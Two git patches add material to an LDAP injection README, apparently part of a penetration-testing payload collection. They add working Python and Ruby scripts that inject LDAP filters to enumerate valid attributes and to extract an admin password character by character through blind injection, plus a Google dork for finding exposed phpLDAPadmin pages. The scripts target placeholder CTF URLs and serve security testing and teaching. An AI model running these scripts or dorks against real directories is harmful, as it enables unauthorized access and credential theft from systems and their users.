From f28f83bda69fe3d13f9b8d4b996a597125555206 Mon Sep 17 00:00:00 2001 From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Fri, 21 Feb 2020 23:19:48 +0100 Subject: [PATCH 1/2] LDAPi: add scripts and dorks --- LDAP Injection/README.md | 62 +++++++++++++++++++++++++++++++++++++++- 1 file changed, 61 insertions(+), 1 deletion(-) diff --git a/LDAP Injection/README.md b/LDAP Injection/README.md index ab77077..5153b89 100644 --- a/LDAP Injection/README.md +++ b/LDAP Injection/README.md @@ -96,9 +96,69 @@ userPassword:2.5.13.18:=\xx\xx userPassword:2.5.13.18:=\xx\xx\xx ``` +## Scripts + +### Discover valid LDAP fields + +```python +#!/usr/bin/python3 + +import requests +import string + +fields = [] + +url = 'https://URL.com/' + +f = open('dic', 'r') #Open the wordlists of common attributes +wordl = f.read().split('\n') +f.close() + +for i in wordl: + r = requests.post(url, data = {'login':'*)('+str(i)+'=*))\x00', 'password':'bla'}) #Like (&(login=*)(ITER_VAL=*))\x00)(password=bla)) + if 'TRUE CONDITION' in r.text: + fields.append(str(i)) + +print(fields) +``` + +Ref. [5][5] + +### Special Blind LDAP Injection (without "*") + +```python +#!/usr/bin/python3 + +import requests, string +alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;" + +flag = "" +for i in range(50): + print("[i] Looking for number " + str(i)) + for char in alphabet: + r = requests.get("http://ctf.web??action=dir&search=admin*)(password=" + flag + char) + if ("TRUE CONDITION" in r.text): + flag += char + print("[+] Flag: " + flag) + break +``` + +Ref. [5][5] + +## Google Dorks + +``` +intitle:"phpLDAPadmin" inurl:cmd.php +``` + +Ref. [5][5] + ## References * [OWASP LDAP Injection](https://www.owasp.org/index.php/LDAP_injection) * [LDAP Blind Explorer](http://code.google.com/p/ldap-blind-explorer/) * [ECW 2018 : Write Up - AdmYSsion (WEB - 50) - 0xUKN](https://0xukn.fr/posts/WriteUpECW2018AdmYSsion/) -* [Quals ECW 2018 - Maki](https://maki.bzh/courses/blog/writeups/qualecw2018/) \ No newline at end of file +* [Quals ECW 2018 - Maki](https://maki.bzh/courses/blog/writeups/qualecw2018/) +* \[5] [LDAP Injection - HackTricks][5] + +[5]:https://book.hacktricks.xyz/pentesting-web/ldap-injection From 3fad2f364c7f0577bb11a693b0b9ce8ffd989025 Mon Sep 17 00:00:00 2001 From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Fri, 21 Feb 2020 23:49:50 +0100 Subject: [PATCH 2/2] add ruby script --- LDAP Injection/README.md | 25 ++++++++++++++++++++++++- 1 file changed, 24 insertions(+), 1 deletion(-) diff --git a/LDAP Injection/README.md b/LDAP Injection/README.md index 5153b89..45c92db 100644 --- a/LDAP Injection/README.md +++ b/LDAP Injection/README.md @@ -136,7 +136,7 @@ flag = "" for i in range(50): print("[i] Looking for number " + str(i)) for char in alphabet: - r = requests.get("http://ctf.web??action=dir&search=admin*)(password=" + flag + char) + r = requests.get("http://ctf.web?action=dir&search=admin*)(password=" + flag + char) if ("TRUE CONDITION" in r.text): flag += char print("[+] Flag: " + flag) @@ -145,6 +145,29 @@ for i in range(50): Ref. [5][5] +```ruby +#!/usr/bin/env ruby + +require 'net/http' +alphabet = [*'a'..'z', *'A'..'Z', *'0'..'9'] + '_@{}-/()!"$%=^[]:;'.split('') + +flag = '' + +(0..50).each do |i| + puts("[i] Looking for number #{i}") + alphabet.each do |char| + r = Net::HTTP.get(URI("http://ctf.web?action=dir&search=admin*)(password=#{flag}#{char}")) + if /TRUE CONDITION/.match?(r) + flag += char + puts("[+] Flag: #{flag}") + break + end + end +end +``` + +By [noraj](https://github.com/noraj) + ## Google Dorks ```